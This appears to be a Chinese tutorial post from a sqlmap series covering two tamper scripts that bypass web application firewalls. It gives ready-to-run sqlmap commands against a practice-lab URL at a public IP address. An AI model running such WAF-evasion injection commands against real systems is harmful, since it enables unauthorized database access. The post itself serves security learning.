zoukankan      html  css  js  c++  java
  • sqlmap从入门到精通-第七章-7-13 绕过WAF脚本-modsecurityzeroversioned&multiplespaces.py

    26. modsecurityzeroversioned.py脚本

    使用带有数字0的注释(/*!00000 */--) 包围整个完整的查询 适用于mysql数据库

    实战演示:

    测试地址:python sqlmap.py -u http://106.54.35.126/Less-1/?id=1 --dbs --tamper="modsecurityzeroversioned.py" --proxy="http://127.0.0.1:8080" -batch

     确认是可以进行这正常注入,我们看看burp抓包效果

     

     -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

    27. multiplespaces.py脚本

    这个作用是SQL注入关键字旁边附近多加个空格,例如:"tampler('1 union select bmfx'") 将其处理为 "'1 union select bmfx'" 适用于所有数据库

    实战演示:

    测试地址:python sqlmap.py -u http://106.54.35.126/Less-1/?id=1 --dbs --tamper="multiplespaces.py" --proxy="http://127.0.0.1:8080" -batch

    确认可以注入,我们看看burp抓包效果

     效果还是比较明显的,添加了很多空格

    迷茫的人生,需要不断努力,才能看清远方模糊的志向!
  • 相关阅读:
    手把手教你安装系统-只需一个U盘
    Linux系统优化05-Centos修改主机名
    Linux系统优化06-Centos远程登录与连接(SSH配置)
    数据库ACID
    Java中的String,StringBuilder,StringBuffer三者的区别
    zookeeper的选举机制
    mysql的数据类型
    常用类(四)
    常用类(三)
    常用类(二)
  • 原文地址:https://www.cnblogs.com/autopwn/p/13539608.html
Copyright © 2011-2022 走看看